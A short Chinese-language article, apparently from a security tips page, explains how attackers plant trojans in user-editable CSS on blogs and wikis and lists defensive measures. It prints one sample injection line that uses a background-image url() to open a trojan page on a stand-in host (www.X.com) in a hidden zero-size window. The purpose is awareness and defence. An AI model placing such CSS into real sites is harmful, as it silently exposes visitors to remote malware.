CSS可以用来编写网页特效,但说到CSS可以挂木马,你是不是有点不信?
随着web2.0的普及,网页形式日新月异,许多可以自定义CSS的wiki、网站、社区、博客日益增多。这也就成了挂马黑客们的温床。
这些黑客往往借着网民们对大网站的信赖,在自己的博客或其他页面中植入木马,欺骗访问的用户。
一般黑客在CSS中注入木马的方式很简单,就是将木马放到指定的位置,然?后利用body、background-image等方式调用背景图片,或者在调用的命令中插入T代码,形成:
background-image: url(t:open("http://www.X.com/muma.htm","newwindow","border="1" Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no"))
这种中病毒的症状一般是不易被发现的,往往只是表现为打开了一个空白网页,或者网页悄悄在后台运营,干脆让用户看不到。
所以,为了预防CSS病毒和木马,大家应该至少做到以下几条:
1、安装防病毒软件,在打开来路不明文件时一定要扫描,在软件有提示时一定慎重选择操作。
2、不要随意访问陌生网页,尽量屏蔽网页自动打开的窗口;
3、经常更新系统漏洞文件;
4、过滤比较敏感的CSS内容,如 emiao1:expression(this.src="about:blank",this.outerHTML="");